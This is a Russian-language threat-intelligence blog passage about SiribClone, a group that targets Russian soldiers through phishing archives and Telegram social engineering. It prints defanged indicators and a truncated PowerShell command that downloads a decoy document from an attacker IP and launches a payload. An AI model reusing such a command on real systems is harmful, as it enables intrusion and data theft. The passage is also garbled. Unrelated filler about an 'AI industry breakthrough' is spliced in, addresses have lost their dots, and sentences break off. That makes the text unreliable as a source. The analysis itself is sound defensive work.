Приманка для командира: изучаем атаки новой кибершпионской группировки SiribClone на российских военных

Значимый прорыв формирует отрасль ИИ: EditorF6 8 минут назад Приманка для командира: изучаем атаки новой кибершпионской группировки SiribClone на российских военных Средний 8 мин 93 Блог компании F6 Информационная безопасность * Кейс Привет! На связи - команда киберразведки (Threat Intelligence) компании F6. Мы выпустили исследование атак новой киберпреступной группировки, которые направлены против российских военных, и делимся его результатами.

Военнослужащие ВС РФ – по-прежнему среди приоритетных целей атак киберпреступников, которые занимаются шпионажем и мошенничеством. Раскрыть инфраструктуру ранее неизвестных злоумышленников помог файл, который эксперты F6 Threat Intelligence обнаружили в феврале 2026 года. Специалисты F6 назвали группировку SiribClone – по метаданным одного из атакующих и используемому инструменту rclone (утилита командной строки с открытым исходным кодом для работы с облачными хранилищами).

Технические детали

Несмотря на небольшое количество обнаруженных публичных сэмплов, мы установили, что атакующие активно тестировали свои разработки с декабря 2025 года, а самые ранние следы фишинговой активности злоумышленников датируются летом 2025 года. Кроме того, в ходе исследования мы выяснили, что группировка распространяет вредоносные файлы для десктопных и мобильных устройств, используя в качестве приманок приложения для «безопасного обмена фотографиями» и другие сервисы, документы на военную тематику, а также активно применяют социальную инженерию для получения доступа к Telegram-аккаунтам российских военнослужащих. Причём участники группировки под видом девушек, «желающих познакомиться», и волонтёров лично общаются с военными через Telegram и другие популярные платформы.

Данная активность была зафиксирована в январе-феврале 2026 года, однако по обнаруженным сетевым артефактам можно предположить, что SiribClone применяет фишинг через Telegram с лета 2025 года по настоящее время. В мае 2026 года, спустя несколько месяцев «молчания» SiribClone, мы обнаружили новые файлы группировки, которые злоумышленники распространяли через сайт, мимикрирующий под тематику Дня Победы («Бессмертный полк»). Итоги исследования инфраструктуры новой группировки, инструментов, которые используют злоумышленники, представляем в этом блоге.

После прочтения сжечь Файл, с которого началось наше исследование, был загружен на платформу для анализа файлов. С Google-диска загружался файл под названием «Решение по СВОДУ. zip» по ссылке hxxps://drivegooglecom/file/d/1DjDui8hEf6GXTJeeETXCo1r3NBizj1WR/view?

Отраслевые последствия

Рисунок 1 – Содержимое загруженного архива на Google-дискеВ архиве, защищенном паролем, находится файл «Решение по СВОДУ. При открытии выполняется следующая команда, открывающая файл-приманку с hxxp://185173215:11317/content/pt/SVODU. docx и запускающая файл REA.

md с GitHub:/c powershell -c "$i=$env:TEMP+'\SVODU. docx'; iwr hxxp://185173215:11317/content/pt/SVODU.

Этот прогресс даёт важные сигналы о будущем отрасли, и технологический мир внимательно наблюдает.